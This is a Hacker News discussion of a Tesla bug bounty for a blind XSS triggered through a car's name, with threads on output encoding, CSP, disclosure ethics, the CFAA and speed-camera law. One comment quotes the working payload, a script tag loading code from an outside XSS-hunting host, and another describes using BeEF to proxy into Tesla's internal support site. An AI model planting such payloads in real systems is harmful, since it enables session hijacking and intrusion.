Hacker News new | past | comments | ask | show | jobs | submit login
Cracking My Windshield and Earning $10k on the Tesla Bug Bounty Program (samcurry.net)
574 points by EdOverflow on July 16, 2019 | hide | past | favorite | 182 comments



This bug probably existed because some developer thought "this is an internal application, I don't need to apply the same rigorous input/(edit: and output, as replies point out) sanitation as I do with normal sites because it's only accessible by VPN."

As a consultant that gets to see a lot of "internal only" applications, this is one of the misconceptions that me and my coworkers try to fight against. XSS is effective even if the attacker doesn't have access to the internal application, because it's not the attacker's computer making the requests.


Output sanitization is what you want to bet on. Only your website / app knows where a piece of data will be displayed, so that is when you should apply appropriate encoding of the output stream.


Yup. React has this by default with everything you render. You have to override it with “dangerouslySetHtml” if you don’t want it.



As have done other frameworks for quite some time, btw.


As other frameworks have done for quite some time* :)


As done framework time some other.


Actually, input might be the better option as one rarely needs to accept HTML or such special characters.

It's also a more common to display or use data than storing it, so you don't have that many places where you can fail when you just convert the input before storing it.

It's nice to be able to trust all data coming from the server.


Trust but verify. The only correct option is to do both.


Can you (or another commenter) give an illustration of this sort of output sanitation?


The term you probably want to look for in your web framework is "encoding".

I don't like "sanitization" personally, because it sounds like you're removing "bad stuff", but in general, "bad stuff" is not identifiable or removable because "bad stuff" is highly context-dependent, plus a lot of times the "bad stuff" is perfectly legitimate [1]. Apostrophes are "bad stuff", because they can break out of SQL queries and HTML tags, but they are also parts of people's names. Double-quotes are "bad things", but they are legitimately part of all sorts of real data. Any "sanitize(string)" function is by definition wrong because it has no place for a context to go, and it will do bad things to your data.

One of my items on my short checklist for examining an HTML templating language is "does the simplest possible way to dump out a string to the user at least do HTML encoding on the value"? That is,

    x = "<>"
    template = compileTemplate("{x}")
    template.Dump({x: x})
for whatever the simplest output of a value is, should output "&lt;&gt;"; if it outputs "<>", you've got a templating language that you ARE going to write XSS attacks in, no matter how careful you are. The time you want to dump out non-encoded text is the exception, not the rule.

Bonus points for being even more aware of the context and correctly encoding things in Javascript context vs. HTML context, etc. This isn't a magic wand that fixes everything, but in general, if it does default to a blind HTML-encode it at least means that instead of a security failure if you screw up the encoding, you'll get the user seeing some ugly stuff on their screen like &lt; instead.

[1]: Although, technically, I think it's acceptable for an HTML encoding function to just eliminate the ASCII control characters other than newline, carriage return, and tab, rather than encode them. Those are just asking for trouble, even if you encode them. Especially NUL. Even in 2019, best to keep NULs out of places they don't belong.


Exactly, sanitization is a misnomer. If you are concatenating plain text together with HTML then you have an app which is functionally broken when someone with an apostrophe in their name tries to use it -- it's not just a matter of security. The strings must be the same format (i.e both valid HTML fragments) before you concatenate them or the result will be unparsable garbage.

And the idea of "sanitization at input" is especially ridiculous: how can you know what you will be concatenating that input with until you actually do it? I.e. is it being inserted into some HTML? is It going in an attribute value or a text node? What about outputting JSON?


Right.

This is why we typically speak about defense in depth. Input sanitization works best when applied to known expected inputs, like a phone number or dob.

Output encoding is the real solution where we know where we intend any data to end up (this is how it’s displayed) so we can ensure that it’s in the correct format and that that format parser won’t interpret it as code instead of data. Ie html attribute, html, Json, JavaScript, etc.


If a user has a bracket character in any field, it's OK to allow it, as long as you don't render it directly in any HTML. You have to make sure that when you render it you render it as `&lt;` or `&gt;`, which get displayed as `<`, or `>`, but aren't interpreted as HTML.


Correct. And one reason to properly format for output, rather than sanitise input is because you do not know how the string might be used. I mean you can sanitise for HTML output, but it won't cover shell command output (i.e.: when you pass the string as a parameter to a tool via --vehicle-name=). Thus input is to be stored as is, and NEVER trusted even if some input sources "sanitise" it.


this mistake is what causes the incredibly common html entities in plain-text emails, as well as RSS article titles.


Output formatting, example: "><script src="// becomes &quot;&gt;&lt;script src=&quot;// for the web. For other types of applications, where any of these characters have special meaning and might be interpreted, these might be formatted differently for output.


Hell even in my past career supporting hardware network products a lot of companies had / have management ports that are vulnerable to all sorts of stuff. The industry standard response from engineers was "well that should be behind a firewall".

It's time we stop pretending the big bad internet is just "out there" just because it should be, it is everywhere.


Normally, it would not be the input to be sanitised, but rather the output properly formatted. It's easier to make sure that ANY type of input is shown properly, as opposed to eliminating SOME of the known issues.


Note that even if it's only accessible by VPN, attackers can still make HTTP requests to it because when an employee connected to the VPN visits attacker.com , attacker.com can make XHR calls to internalsite.com . The attacker can't read the response (unless there are other vulnerabilities), but if you don't have CSRF protection, the attacker can perform actions on the internal site.


Could just be because the application was written by a less experienced programmer, or even outsourced?


It could be, or it could even be that whatever process that brings code from development to production is less stringent on internal applications. Maybe people don't review the code as closely (or at all!), maybe they have fewer tests for internal code. "Internal only" applications almost universally have less scrutiny applied to them in my experience.


I've seen very experienced developers make mistakes with input/output sanitation.


I work as a contractor for a bank and while investigating a small security issue reported by a third-party audit firm, we discovered that the clever, bytecode-weaving-autogenerated-declarative security had been overriden by someone who added his own, equaly fancy security module directly in a parent project.

I cannot describe the shock when I realized what information an attacker could have gained in a window of 6 months the bug was active.

All of this code was written by experienced programmers, it's just that nobody ever wrote any tests to ensure the fancy security code was still in place.


Tesla and SpaceX are both pretty maniacal about not outsourcing programming, to my knowledge.


Interesting. Obviously they view it as a core competency. This would seem like a non-obvious and unnecessary expense to many, but (on the Tesla side) differentiates them from other automakers. Whether that results in a barrier to competition... we'll see.


Although if you believe these anecdotes from a supposed ex-employee then competency is not the word to use:

https://twitter.com/atomicthumbs/status/1032939617404645376


I only know of low-level tools being open sourced like service meshes, RPC clients, event busses, and metric servers. I’ve never seen internal applications open sourced. Do you have an example?


OP said out sourced, not open sourced


This stuff should be taken care of by your web framework wherever possible.


> On a final note, Tesla’s bug bounty program is fantastic. They provide a safe haven for researchers who are in good-faith trying to hack their cars. If you accidentally brick one, they’ll even offer support in attempting to fix it.

This is an amazingly open and refreshing policy!


* Subject to Tesla's definition of "good faith".

Another hacker who discovered references to the Model 3 in his car before its announcement:

* had his vehicle firmware downgraded to a version that contained no such references

* had his vehicle blocked from receiving further firmware updates

* had his vehicles ethernet port disabled

* [deleted] caught some commentary from Musk about his hacking behavior put himself, and other drivers at risk.[/deleted]


Source? The closest thing I can find is this, which matches some details of your description but conflicts with others: https://twitter.com/elonmusk/status/706185709481119745


Interesting, I hadn't seen that reply. I edited my previous comment.


Tesla and send a custom update that breaks your specific car that you bought?


They would call it "protecting their IP", rather than "breaking", but yes.

Though I suppose it's not technically "breaking" but downgrading.


You are entitled to the software provided with the vehicle at time of purchase, no more.

Tesla software is Tesla IP. Would you dump your company's Github repos to customers? If not, why would Tesla wanting to tightly control their firmware and its contents be different? I have yet to run across a license agreement when code is provided to a customer that allows reverse engineering or disassembly.

I do disagree with the decision to disable ethernet ports on an owner's product.


> You are entitled to the software provided with the vehicle at time of purchase, no more.

And is the company entitled to reach into your device and remove the software provided and substitute it with an older version?


If the statement above is correct then they can substitute any newer version of the software with the one that was installed when you bought it.

One could argue whatever that because Tesla advertises heavily with OTA upgrades that they are included in the purchase price and therefore should not be able to be unilaterally pulled.


Many software updates are effectively product recalls, even if we don't call them that. Replacing the most recent software with a recalled version could be a safety concern, depending on what bugs exist in the old software.

I don't know exactly what obligations automakers have with respect to recalls, but I would expect that it's something more than just "we aren't allowed to make the car any more broken than it was the day you bought it".


>You are entitled to the software provided with the vehicle at time of purchase, no more.

Is this actually true? I'm entitled to a working product, so if a future update fixes bugs, am I not entitled to it?

Also, specifically in Tesla's case, they advertise that their cars are "capable of providing Autopilot features today, and full self-driving capabilities in the future through software updates". If that does happen, am I not entitled to that update considering I bought a Tesla with that in mind?


As I have to say far too often to people:

"What does your contract [or in this case, purchase agreement] say?" If it is silent on the subject of updates, how would a court interpret the argument that you are entitled to free software updates? For how long?

The battery and powertrain warranty is specific. The remaining component warranty is specific. The amount of time you receive premium data for is specific. There is no language to my knowledge (I would have to pull the purchase agreement for my Model S out) that speaks to a purchaser's entitlement to software updates when purchasing any model of Tesla.


The lack of specific language in the contract means that it is open to interpretation. And the most reasonable interpretation is that you are entitled to all updates because that is what is in their marketing.


Agree to disagree that is a reasonable interpretation.


Then you'd have a case for deceptive marketing, perhaps, if your "reasonable interpretation" is that advertising "full self driving will be available with this hardware subject to regulation" but your literal interpretation of the caveat is "but not to you, ever".


Whether their marketing language is included in the actual contract is irrelevant. If sales people and Tesla sell cars based on the idea that a Tesla is better because you get software updates and added functionality down the road (which they do), courts would most definitely side with the consumer.

Not to mention the fact that courts also tend to side with consumers when it comes to "implied contracts". If every car sold has and still does get updates on a regular basis, Tesla can't just not give the same to some customers.

Now, there may well be a provision allowing in the contract staying they have a right to deny updates if you try to reverse engineer things, but otherwise, they would need to go through the courts to go after someone for breach of contract. You don't get to take the law into your own hands when you suspect someone of wronging you.


I love that we're living in a world where you can accidentally brick your car. The future, man, the future.


As an owner of a 1974 Mini Clubman, I can assure you that the ability to "brick" your car by tampering with it is not a new concept...


I don't. Especially if it can be bricked through the internet in the middle of driving at high speed.


Does this mean you can legally mod your car under the guise of hacking it?


It's not illegal to have a NO2 factory in your garage, it's illegal to drive it on the roads. A good-faith emissions control hacking would probably not involve long-distance highway driving or racing.


I was thinking you wouldn't have to tell Tesla this, but it's a good point because the car is connected so they would know if you were driving it or not.


Modding cars is already legal.


I mean, you need to expand this statement, because with just those 5 words it's blatantly untrue. There's a whole load of mods allowed by my insurance and I'm sure you'd consider most of them "modding" - the law also has no opinion on most of them unless they start changing the emissions of the car(in which case that's still not the end of the world, you can get the car re-certified for the new emissions figure).

Edit: ignore me, I apparently cannot read


You're being pedantic. Saying "modding cars is legal" doesn't mean it's unrestricted.

Since when do insurance companies approve car mods? And what does that have to do with something being legal?

The only federal legal restrictions are on emissions equipment and safety equipment like seat belts and airbags. Some states have additional laws like tint limits and exhaust sound limits.


Wait, I either misread his comment, or it was changed after I replied - I was replying with the assumption that he said "modding is already illegal".

And any mods have to be reported to your insurer in the UK, even if it's just changing rims or putting on non-standard size tyres - failing to do so might get your claim denied if you ever file one.


Also, at least in the US, there is little chance an insurance company could deny a claim based on a mod (reported or not) as long as said mod could not reasonably be construed to be the cause of the claim.

Not that they wouldn't try.

Same as the whole "warranty void if seal is broken" nonsense.


I misread it exactly the same as you and had to go back.

I think since the default is for something to be "legal" until it is made "illegal" it makes the phrase "already legal" an uncommon one.


Maybe if you only drive in a private property and not public roads. Probably like aftermarket modifications currently.


This topic made me think of a funny old video of a farmer who put a turbo on his tractor.

Probably illegal to drive this on any public road, however on his own property/private roads he is having a blast.

https://www.youtube.com/watch?v=IZZpAO0jP7E


What is with this latent assumption in this thread that DIY activity is a priori illegal? Of course it's legal to mod your car under the guise of hacking. Just like it's legal to mod your car under the guise of throwing a birthday party. The "guise" is irrelevant!

There's obviously legal nuance involving speed, safety, etc. But propagating a cultural assumption of "doing something weird must be illegal" is frightening.


It comes down to DRM and BS in the software industry. Anything with a EULA usually disallows you from doing anything "unauthorized" with it, and Teslas have a lot of software and EULA


I will agree that software authoritarianism is a big source of ambiguous fear being pushed onto other endeavors, but a contractual dispute is a far cry from "illegal". And yes the broken-ass DMCA can lift some of that into the realm of illegal, but even that is practically unenforceable beyond a mere chilling effect on publishing.


>but even that is practically unenforceable beyond a mere chilling effect on publishing

Not with Tesla recording remotely what "owners" do with their cars.


Also some gearing changes most likely.

I'd want a lot more roll cage than he has on there.


What a great response and turnaround. Bug as fixed within 24 hours and paid out within a month.

I wouldn't expect any other car manufacturer to respond ever, most don't even own their software stack.


A lot of other vehicle manufacturers couldn't anyway, they don't build the infotainment systems in-house, they simply just re-theme/re-badge the units from companies like Panasonic, Pioneer, Fujitsu-Ten, etc.

So if they got a bug report it would have to travel through ten layers of indirection before an engineer got to read it (let alone understand/respond). Particularly when there might be two or three different written word languages used between consumer and engineer (e.g. English -> Japanese -> Mandarin (Taiwan)).

Tesla (and Ford previously) were actually oddballs in that they didn't use "off the shelf" infotainment units.


I've tried reporting a bug where on a 2016 Mercedes GLA if you're playing MP3s from a USB stick the car will remember the track to play but nothing else about it, so after coming back the same track plays but with the wrong name, wrong album art, etc etc. It's literally impossible to. The dealer said they have no way to do that except for just flashing my car with a newer FW and hoping it fixes it(it didn't), messaging Mercedes UK yields no reply, posting on their official forums yields no reply.....I just gave up after a while.


   Tessa (and Ford previously) were actually oddballs in that they didn't use "off the shelf" infotainment units.
Isn't being different great sometimes?


I had to rent a ton of cars over the past year before finally buying one and always remarked out how shitty the infotainment systems were, and that the only one which didn't actively piss me off was Ford's. Now I know why!


We should always, always plaude and praise companies that are at least this serious about bounty programs.

Two years ago, despite I wouldn't call myself the deepest technical person on the planet, I found a terrible bug that exposed 1.1M records for a bay area startup. (edit: the bug was really easy to find, it was a form of URL injection. I couldn't even believe that bug was there in the first place).

I reached out to them multiple times, only to realize they were going to ignore me in perpetuity. I didn't even want money, I would have been happy just to see the bug fixed. (I never helped fix a bug that another company had). Nada.

A less scrupulous person would have sold that information and exposed data for 1.1M people.

I am not naming the company here, even though they would totally deserve it.


I once reverse engineered a Gmail worm found in the wild. The underlying exploit ended up being a security scan bypass in Google docs. I spent a lot of time submitting a bounty report, but I made one fatal mistake: I used URL redirection in the PoC. It was automatically rejected even though that was an example of content that the scan normally detects, not the actual vulnerability. It was closed as not eligible, then silently fixed a week later.

Edit: I checked the emails to refresh my memory. A human acknowledged that it was a flaw in the security scanner and forwarded it to the drive team, then a bot (AFAICT) determined that it was not eligible based on metadata in the report.

Edit 2: I did get one thing out of it. They sent me an invitation to a Bounty Craft event in Las Vegas during Def Con which I was attending that year (likely the actions of another bot scraping the email list). I got there early and accidentally sat down in the Microsoft Security Response team's couch area while they were all up getting food. They were nice people. They realized I never picked up swag on the way in and someone took me back to the door to get it. Apparently since I was with one of the event organizer and they said "you forgot to give him a t-shirt" they assumed I was staff and gave me a staff t-shirt. The event was 100% about how the sponsor companies were investing in automated fuzzing technologies and basically didn't need bug bounty hunters anymore. Slap in the face.


Apparently google wants you to next time sell it to the highest bidder.


I understand the point you're making about incentives, but the phrasing is poor. The reason people shouldn't sell exploits to the highest bidder isn't because the vulnerable software author refuses to pay a bounty.

People shouldn't sell exploits because it's a crime that hurts people.


In the movie Independence Day the aliens computer systems were hacked with a few hours worth of work. Why were they hacked and destroyed? Because nobody reported and worked on security incidents of course. Why would anyone need to in a militaristic society?

My story is silly, of course, but the point is real. If you don't attack and then fix systems, a lot of people will get hurt.


That's better phrased, indeed. The problem with your earlier statement is that the incentives are not for the people you are talking about.

You don't offer rewards to prevent criminals from selling exploits. Criminals are going to sell exploits anyway. Bug bounties have nothing to do with criminal behavior.

Bounties are there to incentivize the honest people to do security work. And the response of an honest person being denied a bounty IS ABSOLUTELY NOT to turn around and sell it.


I know you meant Proof of Concept, but it took a couple of readings to realize you weren't saying "Person of Color".


The context in no way leads itself to that though. Unless people often have url redirects?


>I am not naming the company here, even though they would totally deserve it.

I do wonder to what extent the culture itself of how we approach bugs is designed to benefit companies over consumers. That we avoid naming and shaming due to a chilling effect of blow back, that we have disclosure windows, that the legal framework for reporting bugs is so flaky, that we are all accustomed to bad security practices and getting our data hacked, it all feels like it is architected to benefit companies who rarely suffer from hacks (sometimes there is a significant cost, but that rarely outweighs the profits).

It reminds me of identity theft. The entire concept that you lost money because your identity was stolen from you, that the bank (or other company) who feel for the fake victim isn't even a party to the actual crime, pushes the costs onto consumers. Instead of seeing it as the banks being the victim and thus responsible to bear the costs that aren't recoverable from the criminals, is is their customers who are. Thus it reduces the cost to the bank of poor identity management. An entire culture that offloads the costs of the bank's penny pinching onto consumers.

Another such examples is when the early automotive industry pushed for people to view jay walking as the crime, shifting blame onto pedestrians for being in the way of cars.


Another aspect of this is the taboo of discussing salaries / compensation with your peers and coworkers. Sure, it might be a bit "low class" to be concerned with money like that, but you know what? We're all mostly working class, and it's in our interest to discuss wages.


It's in your interest to discuss wages if you're paid median or below wages. Wait till you're paid many multiples of your coworkers and then see how you feel about it. The taboo does nothing for most workers, but does protect people who are highly compensated.


In effect, protecting those who are at the top and need the protection the least.


Please become less scrupulous! If that bug isn't fixed, that's just another in a long line of disposable bay area startups run by rich careless people—certainly none of which lurk on HN—who treat sensitive customer information like used tissue. I'm sure there's a way to do it where you don't expose the data, but I'd thinknofnit as a favour to a million people.


I also found a terrible bug recently, that could cost this company millions of dollars.

Basically, the company has physical stores and also sells stuff online. Stuff bought online can be returned in store. However, if you bought an item online which was on sale, you could return in store for the full amount. I returned a laptop which I bought online for $999 and received $1399 back.

I think it was due to the fact that the store runs on iSeries/AS400 and the website is in .Net. I happen to work with both, and I can imagine that there is a lot of pain to make the systems work together.


Quite a lot of companies are vulnerable to forms of this, but will notice if you try to exploit it for "millions of dollars". It normally doesn't have much to do with what technologies they use internally.


I think most times I've returned anything, I've had to show the original receipt, so it'd be pretty obvious to them if I bought the item at a discounted price.

If they didn't bother to look at the receipt for your laptop... well, that seems like negligence on the part of the staff handling the return.


This is a membership store, they do NOT require a receipt. They look up your info, find the item and process the return.


I'm wondering what the right approach is in such a situation. If they don't fix the leak, do you keep quiet or go public? Going public puts them under much more pressure to fix their shit, otoh, bad actors have probably more than enough time to scrape the data. But the other scenario bears the risk of some other bad actor also having discovered it and silently abusing the data. Considering the leak goes unfixed and the company grows they might some time be able to scrape data of ten times as many people.

So would you rather actively help leaking 1m records to public or potentially have someone else getting 10m a year later, but not having anything to do with it directly?

Thinking about it you might try and contact a bigger tech news site to get the companies attention.


Rule of thumb is to notify them and share your intent of public disclosure within a certain time frame. Typically 90 days.

That's exactly what happened with Zoom. They half ass fixed it, then it went public and it was fixed in one day.


Please name them.

> they would totally deserve it.

They do. It is important to warn their customers about their practices. They had their chance and proved they're absolutely incompetent and shouldn't have anyone's data.


But I wonder what if a developer purposely plants a bug then ask his friend to report it and split the bounty. It seems it's easy to take advantage of such programs internally?


It's a little less malicious then backdooring it which has a pretty strong precedent already. Also code review "should" catch it


The repository would show who wrote the bug in the first place, and it would have to pass code review. One would have to wait for the developer to leave the company before activating this scenario.


Developers write bugs all time, it's hard to know if they purposely wrote one or it just got slipped in due to right schedule.


Right now I know of 5-10 serious (100 million plus user data in total) bugs in multiple startups in India. I have reported to them and haven't heard back. The problem is especially severe in India.


If I was their user, I'd want to know if they were so carelessly exposing my data.


If you have been able to access that data, chances are someone else has too. And the data might as well be considered as having leaked already. I wonder if the right course of action would be to send it to haveibeenpwned.


I assume this company has customers in the EU. If the bug still exists today, try dropping a GDPR complaint to one of the European data regulators. Though they have limited resources, they have started taking these things pretty seriously [1] and will look _very_ unkindly on a failure to report the breach or address it.

[1] https://ico.org.uk/about-the-ico/news-and-events/news-and-bl...


All the comments on here seem to be praising Tesla for paying a bug bounty, but I'm just sitting here horrified at how much information a phone support guy is able to view remotely about owners cars, not to mention the ability to send OTA updates.

No way am I buying a connected car.


I think you might be out of options soon, if you want a new car that is. A while longer for used cars obviously.

Once all new cars are connected, the DuckDuckGo of cars will launch soon thereafter with the promise of a privacy centric connected car :)


The real thing you realize here is that Tesla is a software company (and it will eat the world). Getting a hotfix out that fast is the proof in the pudding.


Interestingly, the car returned the (current?) speed:

Speed: 81 mph

I wonder if that, coupled with the GPS info (which wasn't included in the data returned, but I assume the car knows it) would be sufficient to issue a speeding ticket if the government had access to the data?


I know in some jurisdictions at least you also need to identify the driver, because the ticket needs to be made out to whoever was speeding, which may or may not be the owner of the vehicle.


And some countries include a separate offence of "failing to identify the driver", with penalties usually more severe than the driving offence.

A few British politicians have found this out the hard way.

https://en.wikipedia.org/wiki/Chris_Huhne

https://www.theguardian.com/uk-news/2019/jan/29/labour-mp-fi...


I think this [1] Wikipedia article better covers the situation with Huhne.

[1]: https://en.wikipedia.org/wiki/R_v_Huhne


A former Australian federal court judge went to jail for two years for lying about who was driving his car when it incurred a speeding fine worth $77

https://en.wikipedia.org/wiki/Marcus_Einfeld#Criminal_convic...


Unless I'm missing something, both of these cases (and the case of the Australian judge a sibling commenter pointed to) has nothing to do with "failing to identify the driver" but all to do with straight up lying to the courts, i.e. perjury. The fact that they were speeding seems incidental.


Don't worry well have facial recognition for that soon enough


When speed cameras came about jurisdictions that wanted to use them simply changed their law to say that a photo/radar reading of the car speeding by the camera was prima facie evidence that the owner was responsible for the infraction.

Luckily it isn't in Tesla's interest to just hand this info over to the government en mass.


There are indeed some aspects of Arizona I absolutely love. Unfortunately the D's and R's here seem to collude enough to slowly strip away a lot of the protections AZ law used to provide.


It REALLY depends on your government.

In Michigan doesn't allow automatic speeding camera things that automatically issue tickets, while New York does.

Going off how Michigan operates then no, the GPS info wouldn't be enough.

In another government such as China the answer is very likely "Yes".


Your cellphone already has all of this information too. Google Maps will tell me both my current speed and the road's speed limit while driving with navigation on.


But how would they know who to ticket? Just because your car is moving, doesn't mean you're the one driving it. If they cannot prove who was operating the vehicle at the time of infraction, they cannot issue a ticket.


In Alberta, the fine is for owning a speeding car, kind of like a parking ticket. The rationale is that you are responsible for who you lend the car to. It is a civil rather than criminal penalty, so no license points, but no getting out of it either. Rental car companies challenged it and lost (though you can be sure they will pass the cost on to you).


But the real rationale is: let’s blame someone that’s easy to blame instead of figuring out who’s actually responsible.

Germany has photo-radar, but can only issue a ticket to the driver.

Possibly that’s related to some of their history, I’m not sure.

Though they do issue voluntary “caution” money tickets to the owner at a discount to make it go away without identifying the driver.


I believe in the Netherlands they will send a ticket to the owner. The owner then has to pay the ticket or provide the info of the driver.


Same here in Australia.


That's not true, red light cameras have no problem issuing fines to the vehicle owner.


In many places red light cameras ticket the owner of the vehicle as a parking violation,(presumably for having you car in the intersection when the light was red?) whereas typically the driver of the vehicle is ticketed by the officer for a moving violation like speeding or running a light. My memory on this is pretty old though, laws may have changed and it may be location dependent.


Which is why they're a terrible idea, usually implemented out of sheer greed for passive income with no actual police work.


Not to mention the increase in accidents, which it'd be ironic were there a class action lawsuit holding ATS, Redflex and the other companies responsible.


Yes, but they take a picture of the car.

What if you car is being toed by a speeding truck (or on a trailer) ?


Then you could dispute the ticket, and presumably the fact that it's being towed would be visible in the photo.


There is usually a picture of the car along with a time and date of the incident. You would just simply appeal it and say that the car is clearly on a trailer and that the truck pulling the trailer is at fault.


Yes they do. In many jurisdictions, if you are willing to perjure yourself (or are innocent), you can sign an affidavit that you were not driving the vehicle. Then it is up to the authorities to press the case based on quality of the video evidence.

IMO it's a silly hack. The fine should go the vehicle owner, who is responsible for pursuing recompense from the person the lent the car to (or file a theft report, or whatever).


Yeah, in our city a few years ago, a lawsuit was brought that even with camera pictures/video, it can't be proven the vehicle owner was driving the car and so all the red light camera tickets in process were thrown out and the cameras were deactivated. So definitely depends on jurisdiction.


May I ask what city you live in?


The fine goes to the vehicle owner not the driver. This is why if you get fined by an automated speed camera or red light camera on a rental car, the rental company pay the fine and charge it back to you - with admin fees.

If it's a physical ticket on the car (parking, speeding, etc), you can pay it before the rental company ever hears of it and avoid those admin fees.


That doesn't seem to matter. In DC we have speed cameras everywhere and it doesn't matter whether your face is visible in a photo, the ticket will be issued to the plate and must be paid by the owner regardless of who was driving the car.


It's not a traffic offense, at least. While still annoying, I'll take that any day over the alternative. $70 civil penalty vs $150 fine + $70 court costs + increased insurance premiums.

As a side note, it does feel like my due process rights are being violated when I have to deal with this. You can't go in front of a judge, but rather can go argue the ticket in some local government office.


Some insurance companies are already doing this I think where they attach things to your car and if you stay under the speed limit you get discounts on your payments


MetroMile does this with an OBD-II device... their niche is insurance for low-mileage vehicles, and they track your mileage with a dongle device that must always be plugged in.

Seems like a huge information asymmetry, though. Anyone who's ever dealt with an insurance claim knows that they find any nitpick to get out of payments... having an insurance provider that can say "actually we don't owe you anything because according to our black box, you were 2 mph over the speed limit therefore you were negligent" seems like it defeats the purpose of having insurance.

I like the idea of more accurate pricing based on actual (low) usage, but I don't like that it gives them a disproportionately larger surface area for their lawyers to find technicalities that gets them out of paying claims. When the tollbooth transponders came out, they explicitly said "this will never be used to issue speeding tickets" even though all the data was there... I don't believe MetroMile makes any similar promise.


Anyone who's ever dealt with an insurance claim knows that they find any nitpick to get out of payments

"Everyone" says that, but I haven't found it to be true. Progressive fixed my car without any hassle (they paid nearly $5K to replace a door and fender and repaint the side of the car after someone tried to pry open the door). I also made a claim against Geico when a USPS truck hit me, again, trouble free, they paid the claim (minus my deductible) quickly and it took 18 months to get the USPS t

My sister lost her house to a fire and said that her insurance company (Allstate maybe) was super easy to deal with.


I wish I had your experiences in such clear-cut cases. I had to perform an independent investigation to get the insurance company to honor my side of the story in my last car claim, and relatives are dealing with a nightmare of a home insurance story that's looking like the insurance company is going drop them because of the complications involved.

In my experience, everyone is just trying to minimize their cash outflows. Incident claims are a zero-sum game, and if someone gets more or better information, that comes at the expense of someone else.


I wonder... Could you spoof that device? It doesn't seem all too hard to- the ODB-II interface is pretty well documented.


Yeah, there's some reddit posts about doing it to the Progressive Snapshot device. But it being an insurer, you'd potentially be on the hook for insurance fraud, which doesn't carry a light penalty...


No need to worry about MetroMile, those dongles they distribute aren't reliable at all.

Source: Me, after paying hundreds of dollars because the "signal was lost" for over a month, billed at the daily max rate, while their emails about it went to spam.


Liability insurance exists for covering even when you are liable.


There are also companies like The Flow that offer that data directly from mobile devices via an app.


In my country any device that would be giving fines has to be periodically checked every month by the authorities and made unmodifiable without oversight.


Probably not if there is a +/- of 10% error rate.


If you are manufacturing a vehicle/speedometer in 2019 with a 10% margin of error, I'd argue that was "not fit for purpose".

I left Australia in 2006, but even before then, the government had altered the statutes on speeding from the old model - 10% margin of error, to a flat 3kph(2mph) due to "increased accuracy in manufacturing".


Speedometers measure speed by counting wheel rotations and multiplying them by the circumference. There's at least a few percent inherent error as circumference is going to vary with what tyre is fitted and how worn it is.

F1 cars, and I believe now high end sports cars use a differebt system that's basically how an optical mouse works. They image the road underneath the car and measure it moving past. This gives turning in addition. If you watch an F1 night race you can see a glow on the ground under the nose - that's the illuminator for the sensor.


There are also Ka-band Doppler radar systems used for sensing speed on the vehicle (exactly like how a radar gun works). You mount it on the vehicle to point to the ground at an angle and then connect it to a speedometer. Accuracy is usually within 1-3% up to 300mph.


I believe the sensor in F1 is actually measuring the ride height of the vehicle.


In some jurisdictions the law says that the car speedometer must show a higher speed than the correct one (as long as tyres aren't above the correct pressure), so that the driver can "trust" the speedometer to avoid them a speeding ticket. On my car 140 km/h on the speedometer corresponds to 128-130 km/h on the GPS.


They probably use GPS? If not, then just get bigger tires.


They would have to verify beforehand how accurate the speedometer is.


A car's self reported speed is not accurate enough - for example if you slip on gravel or ice, the reported speed would momentarily be higher.


Or if you are braking it will be lower.


I can imagine the support call:

> Did you really name your Tesla "><script src=//zlz.xss.ht></script>?

> Oh, yes, little Bobby ScriptSrc, we call him.


I mentioned this to my coworkers who brought up something I hadn't thought of - would this be illegal in the USA via something such as CFAA? https://en.wikipedia.org/wiki/Computer_Fraud_and_Abuse_Act He technically accessed Tesla's dashboard without authorization, for example.


(Obligatory: I am not a lawyer)

This is what the "safe harbor" that the author was referring to is supposed to cover.

> Tesla considers that a pre-approved, good-faith security researcher who complies with this policy to access a computer on a research-registered vehicle has not accessed a computer without authorization or exceeded authorized access under the Computer Fraud and Abuse Act ("CFAA"). [1]

*.teslamotors.com, which is where the blind XSS payload fired, is in scope and therefore the safe harbor covers that asset too. For more on bug bounty safe harbors, I would highly recommend taking a look at Amit Elazari's work at https://amitelazari.com/%23legalbugbounty-hof and https://github.com/edoverflow/legal-bug-bounty.

[1]: https://bugcrowd.com/tesla


Tesla authorizes certain activities through their Bug Bounty program: https://bugcrowd.com/tesla

This is the first clause in the "in scope" section, so it is not unauthorized.

It would be bad if he used this to just wander around in their website, though. Nobody's contested whether this is worth a $10,000 payout yet, but this seems a decent place to point out that using https://beefproject.com , you can use that XSS vulnerability as a reverse proxy back into Tesla's network, and browse through the support site authenticated as the user currently accessing the XSS payload. This isn't just an XSS, it was a authentication bypass that a real attacker could have leveraged into access into that internal web site full of sensitive info in just a few minutes.


The trend of storing auth tokens in localStorage rather than httpOnly cookies is a problematic trend due to vulnerabilities like this. If you can exfiltrate an authtoken then one gets long lived access to the system.


That's impressive, a support process that is responsive, don't mess about and fair. Companies around the World could learn something from this. They probably won't, but they certainly all could.


Tangentially, how long did it take to get the windshield fixed? I've heard horror stories about their service.


I'm yet to fix it because the crack isn't too bad yet. Their windshield replacement is through retailers who fit their standards and not Tesla directly so I assume it won't be too bad as all they have to do is ship the wind screen.


What would the fix for this be? Enabling CORS only for `https://garage.vn.teslamotors.com`?


CORS won't do it, because it protects the response target, not the response source.

CSP would do the trick, though.

The other fix is properly escaping things before sticking them in your markup.


> The other fix is properly escaping things before sticking them in your markup.

Or simply not displaying user data using a markup language with built-in remote code execution.


Well, yes, there are various levels of "thinking outside the box" here that could be applied.


In addition to properly escaping inputs, Content Security Policy Headers to restrict the hosts that the browser executes JavaScript from (e.g., script-src). https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Co...


Sanitization of the text input (e.g. < becomes &lt;, > becomes &gt;, etc). This is automatic/implicit on a lot of modern web frameworks (since text and Html are distinct types and output to a page are treated differently, with text sanitization being implied unless you opt out).

You shouldn't ever be running untrusted JavaScript. Content Security Policy and similar are just extra layers of protection if you mess up.


Not the input, the output. There are some good comments on this thread about the distinction.

Case in point: the owner altered the vehicle's name using the vehicle's own UI (which is probably not browser based). That input gets stored in the database. Then another system, web-based, wants to display it. If you don't encode the output, you'll be exposed.

Never trust that the input is properly encoded. HTML encode it before display, always.


This pedantism only makes sense if you stop reading five words in, ignore the rest of that same sentence, and ignore the context.

I'm not going to address it because it wasn't made in good faith and adds no value to the actual (rather than imagined) discussion.


> pedantism

Sorry, I can't help myself: pedantry


That would be a good first step, but more importantly making sure any content is rendered in a safe way. In this instance safe means making sure HTML entities are properly encoded and escaped.


There is no reason why an internal interface needs to be in a browser, or a browser with access to the internet.


There's no reason why it shouldn't be either.

